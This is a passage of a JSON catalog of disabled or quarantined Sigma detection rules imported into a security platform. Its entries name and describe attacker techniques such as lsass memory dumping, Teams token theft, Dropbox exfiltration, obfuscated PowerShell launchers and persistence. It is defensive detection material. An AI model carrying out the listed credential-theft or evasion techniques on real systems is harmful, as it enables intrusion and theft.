"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/aws-efs-fileshare-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cb1ba1-8a19-4a23-a198-d252664c8cef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-25cb259b-bbdc-4b87-98b7-90d7c72f8743", "type": "detection", "name": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", "description": "Detects the creation or patching of potentially malicious RoleBinding/ClusterRoleBinding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-rolebinding-clusterrolebinding-modified-and-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-25cde13e-8e20-4c29-b949-4e795b76f16f", "type": "detection", "name": "Suspicious Teams Application Related ObjectAcess Event", "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-teams-application-related-objectacess-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" } }, { "id": "sigmahq-sigma-25eabf56-22f0-4915-a1ed-056b8dae0a68", "type": "detection", "name": "Suspicious Dropbox API Usage", "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dropbox-api-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml" } }, { "id": "sigmahq-sigma-25ffa65d-76d8-4da5-a832-3f2b0136e133", "type": "detection", "name": "PUA - Sysinternal Tool Execution - Registry", "description": "Detects the execution 
of a Sysinternals Tool via the creation of the \"accepteula\" registry key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-sysinternal-tool-execution-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "type": "detection", "name": "Suspicious SYSTEM User Process Creation", "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134", "T1003", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-system-user-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" } }, 
{ "id": "sigmahq-sigma-2625cc59-0634-40d0-821e-cb67382a3dd7", "type": "detection", "name": "Service Reload or Start - Linux", "description": "Detects the start, reload or restart of a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-reload-or-start-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2625cc59-0634-40d0-821e-cb67382a3dd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml" } }, { "id": "sigmahq-sigma-2632954e-db1c-49cb-9936-67d1ef1d17d2", "type": "detection", "name": "Addition of SID History to Active Directory Object", "description": "An attacker can use the SID history attribute to gain additional privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/addition-of-sid-history-to-active-directory-object.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_add_sid_history.yml" } }, { "id": 
"sigmahq-sigma-26481afe-db26-4228-b264-25a29fe6efc7", "type": "detection", "name": "Uncommon Service Installation Image Path", "description": "Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-service-installation-image-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26481afe-db26-4228-b264-25a29fe6efc7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml" } }, { "id": "sigmahq-sigma-26488ad0-f9fd-4536-876f-52fea846a2e4", "type": "detection", "name": "HackTool - SharPersist Execution", "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpersist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26488ad0-f9fd-4536-876f-52fea846a2e4", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml" } }, { "id": "sigmahq-sigma-264982dc-dbad-4dce-b707-1e0d3e0f73d9", "type": "detection", "name": "Renamed NirCmd.EXE Execution", "description": "Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-nircmd-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "264982dc-dbad-4dce-b707-1e0d3e0f73d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml" } }, { "id": "sigmahq-sigma-2650dd1a-eb2a-412d-ac36-83f06c4f2282", "type": "detection", "name": "Detected Windows Software Discovery - PowerShell", "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/detected-windows-software-discovery-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" } }, { "id": "sigmahq-sigma-26b692dc-1722-49b2-b496-a8258aa6371d", "type": "detection", "name": "Clear PowerShell History - PowerShell", "description": "Detects keywords that could indicate clearing PowerShell history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-powershell-history-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26b692dc-1722-49b2-b496-a8258aa6371d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" } }, { "id": "sigmahq-sigma-26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "type": "detection", "name": "PUA - Adidnsdump Execution", "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. Python 3 and python.exe must be installed.\nUsed to query/modify DNS records for Active Directory integrated DNS via LDAP", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adidnsdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml" } }, { "id": "sigmahq-sigma-26e7c5e2-6545-481e-b7e6-050143459635", "type": "detection", "name": "CA Policy Removed by Non Approved Actor", "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ca-policy-removed-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26e7c5e2-6545-481e-b7e6-050143459635", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "type": "detection", "name": "Tomcat WebServer Logs Deleted", "description": "Detects the deletion of 
tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tomcat-webserver-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml" } }, { "id": "sigmahq-sigma-2704ab9e-afe2-4854-a3b1-0c0706d03578", "type": "detection", "name": "HackTool - Dumpert Process Dumper Execution", "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dumpert-process-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" } }, { "id": 
"sigmahq-sigma-272e55a4-9e6b-4211-acb6-78f51f0b1b40", "type": "detection", "name": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", "description": "Detects the removal of folders from the \"ProtectedFolders\" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/folder-removed-from-exploit-guard-protectedfolders-list-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" } }, { "id": "sigmahq-sigma-273a8dd8-3742-4302-bcc7-7df5a80fe425", "type": "detection", "name": "VMMap Unsigned Dbghelp.DLL Potential Sideloading", "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmmap-unsigned-dbghelp-dll-potential-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "273a8dd8-3742-4302-bcc7-7df5a80fe425", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" } }, { "id": "sigmahq-sigma-275641a5-a492-45e2-a817-7c81e9d9d3e9", "type": "detection", "name": "Add DisallowRun Execution to Registry", "description": "Detects setting DisallowRun to 1 to prevent a user from running specific programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-disallowrun-execution-to-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" } }, { "id": "sigmahq-sigma-277a4393-446c-449a-b0ed-7fdc7795244c", "type": "detection", "name": "Renamed FTP.EXE Execution", "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-ftp-exe-execution.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "277a4393-446c-449a-b0ed-7fdc7795244c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" } }, { "id": "sigmahq-sigma-277efb8f-60be-4f10-b4d3-037802f37167", "type": "detection", "name": "Registry Persistence Mechanisms in Recycle Bin", "description": "Detects persistence registry keys for Recycle Bin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-mechanisms-in-recycle-bin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "277efb8f-60be-4f10-b4d3-037802f37167", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" } }, { "id": "sigmahq-sigma-2782fbd8-b662-4eb5-9962-5bfbfb671e7b", "type": "detection", "name": "Suspicious Usage of For Loop with Recursive Directory Search in CMD", "description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-for-loop-with-recursive-directory-search-in-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2782fbd8-b662-4eb5-9962-5bfbfb671e7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml" } }, { "id": "sigmahq-sigma-27aec9c9-dbb0-4939-8422-1742242471d0", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27aec9c9-dbb0-4939-8422-1742242471d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-27ba3207-dd30-4812-abbf-5d20c57d474e", 
"type": "detection", "name": "Suspicious Chromium Browser Instance Executed With Custom Extension", "description": "Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-chromium-browser-instance-executed-with-custom-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" } }, { "id": "sigmahq-sigma-27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "type": "detection", "name": "Suspicious Inbox Forwarding Identity Protection", "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-forwarding-identity-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml" } }, { "id": "sigmahq-sigma-27ee9438-90dc-4bef-904b-d3ef927f5e7e", "type": "detection", "name": "Windows Kernel Debugger Execution", "description": "Detects execution of the Windows Kernel Debugger \"kd.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-kernel-debugger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27ee9438-90dc-4bef-904b-d3ef927f5e7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kd_execution.yml" } }, { "id": "sigmahq-sigma-28036918-04d3-423d-91c0-55ecf99fb892", "type": "detection", "name": "NET NGenAssemblyUsageLog Registry Key Tamper", "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simply specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/net-ngenassemblyusagelog-registry-key-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28036918-04d3-423d-91c0-55ecf99fb892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" } }, { "id": "sigmahq-sigma-28208707-fe31-437f-9a7f-4b1108b94d2e", "type": "detection", "name": "Suspicious Startup Folder Persistence", "description": "Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.\nThese files (.ps1, .vbs, .js, .bat, etc.) 
are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.\nThis technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-startup-folder-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28208707-fe31-437f-9a7f-4b1108b94d2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" } }, { "id": "sigmahq-sigma-28268a8f-191f-4c17-85b2-f5aa4fa829c3", "type": "detection", "name": "Google Cloud DNS Zone Modified or Deleted", "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-dns-zone-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
